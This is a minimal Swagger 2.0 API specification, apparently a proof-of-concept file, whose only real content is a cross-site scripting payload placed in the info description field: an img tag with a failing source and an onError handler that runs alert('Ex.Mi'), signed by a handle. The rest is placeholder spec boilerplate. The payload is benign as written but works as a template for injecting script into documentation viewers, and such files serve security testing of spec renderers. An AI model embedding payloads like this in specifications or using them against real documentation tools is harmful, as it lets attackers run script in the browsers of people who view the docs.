swagger: '2.0'
info:
  version: "0.0.1"
  title: Example Title
  description: <img/src=x onError="`${x}`;alert(`Ex.Mi`);"> -@ex_mi
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
